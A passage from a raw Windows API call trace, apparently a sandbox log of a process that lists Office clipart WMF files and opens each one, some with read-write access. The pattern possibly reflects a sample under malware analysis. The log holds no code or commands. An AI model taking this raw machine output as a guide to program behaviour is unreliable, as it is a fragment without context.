lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.388] AreFileApisANSI () returned 1 [0101.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 69 [0101.388] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc89dc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c)) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0101.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.388] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.388] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN03500_.WMF", cAlternateFileName="")) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0101.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.389] AreFileApisANSI () returned 1 [0101.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.389] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.390] AreFileApisANSI () returned 1 [0101.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 69 [0101.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.390] GetFileType (hFile=0x33c) returned 0x1 [0101.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.390] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.391] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.391] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.391] CloseHandle (hObject=0x33c) returned 1 [0101.391] AreFileApisANSI () returned 1 [0101.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 69 [0101.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.391] GetFileType (hFile=0x33c) returned 0x1 [0101.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.392] CloseHandle (hObject=0x33c) returned 1 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.393] AreFileApisANSI () returned 1 [0101.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 69 [0101.393] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2418)) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0101.393] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x928, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04108_.WMF", cAlternateFileName="")) returned 1 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0101.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.394] AreFileApisANSI () returned 1 [0101.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.395] AreFileApisANSI () returned 1 [0101.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0101.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 69 [0101.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c 